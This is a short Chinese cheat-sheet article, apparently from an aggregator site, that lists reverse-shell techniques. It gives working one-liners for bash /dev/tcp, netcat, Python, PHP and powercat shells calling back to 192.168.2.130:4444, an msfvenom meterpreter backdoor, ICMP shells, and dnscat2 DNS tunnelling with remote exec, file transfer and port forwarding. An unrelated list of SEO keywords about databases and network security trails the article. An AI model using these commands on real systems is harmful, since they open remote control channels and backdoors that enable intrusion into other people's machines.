反弹shell有哪些
发表于:2024-11-18 作者:千家信息网编辑
千家信息网最后更新 2024年11月18日,这篇文章将为大家详细讲解有关反弹shell有哪些,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。1.bash反弹bash -i >& /dev/tcp/ip_addr
千家信息网最后更新 2024年11月18日反弹shell有哪些
这篇文章将为大家详细讲解有关反弹shell有哪些,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。
1.bash反弹
bash -i >& /dev/tcp/ip_address/port 0>&1
2.nc反弹
nc -e /bin/sh 192.168.2.130 4444
3.python
import socket,subprocess,oss =socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(( "192.168.2.130" , 4444 ))os.dup2(s.fileno(), 0 )os.dup2(s.fileno(), 1 )os.dup2(s.fileno(), 2 )p = subprocess.call([ "/bin/bash" , "-i" ])
4.powercat
Import-Module .\powercat.ps1powercat -c 192.168.2.130 -p 4444 -e cmd.exe
5.msf生成exe后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.130 LPORT=4444 -f exe > shell.exe
6.php反弹shell
php -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
7.ICMP
关闭icmp响应,不然shell一直跳,恢复是0sysctl -w net.ipv4.icmp_echo_ignore_all=1python icmpsh_m.py 源 目标python icmpsh_m.py 192.168.2.137 192.168.2.135
在windows7运行:
icmpsh.exe -t 192.168.2.137
8.DNS
https://downloads.skullsecurity.org/dnscat2/
这里我们使用dnscat2,这里是下载的,分为windows和linux版本,服务端和客户端。
并且推荐使用vs2008编译
安装
git clone https://github.com/iagox86/dnscat2.gitcd dnscat2cd serversudo gem install bundlerbundle installsudo ruby ./dnscat2.rb
kali
ruby dnscat2.rb --dns host=0.0.0.0,port=53531ruby dnscat2.rb --dns server=23.105.193.106,port=533,type=TXT --secret=123456(密钥)ruby dnscat2.rb xxx.com
windows7中:
./dnscat --dns server=192.168.2.130,port=53531./dnscat --dns server=192.168.2.130,port=53531 --secret=qwer1234(密钥)./dnscat xxx.com
连接成功后
查看记录
选择连接
使用shell
返回选择shell
执行命令
其他命令
quit (退出控制台)kill(中断通道)set(设值,比如设置security=open)windows(列举出所有的通道)window -i (连接某个通道)连接通道后,使用help同样可以看到其内支持的命令(单个命令后跟-h也会解释该命令):clear(清屏)delay(修改远程会话超时时间)exec(执行远程机上的程序)shell(得到一个反弹shell)download/upload(两端之间上传下载文件)supend(返回到上一层,等于快捷键ctrl+z)
DNS隧道转发
listen 127.0.0.1:6666 192.168.2.135:80本机的6666就可以访问80端口
关于"反弹shell有哪些"这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看到。
命令
通道
篇文章
密钥
更多
选择
不错
实用
成功
上传下载
两端
之间
内容
单个
后跟
后门
客户
客户端
快捷键
控制台
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
旅游软件开发的启发
河南服务器机柜厂虚拟主机
清远数据链软件开发报价行情
信用数据库安全
什么是新兴的无线网络技术
数据库中的文件怎样转换
网络安全课后感怎么写
达梦数据库覆盖索引
8d报告适用于软件开发吗
端游方舟开服务器花钱吗
服务器的安装和使用
关系数据库二维表的行
网络安全认证有用么
网络技术毕业后工作
安卓软件开发常用工具
自建服务器安全设置
奔坏三兔女郎的皮肤是那个服务器
计算机软件开发自考
软件开发类办公室
数据库的简单演讲
云数据库恢复案例
计算机网络安全与实验教程马丽梅
南大的大学的网络安全专业
网络技术行业标准
关系数据库二维表的行
服务器维护工具
网络安全知识大科普
网络安全方面的好书
君畅网络技术有限公司
网络安全奖学金 交大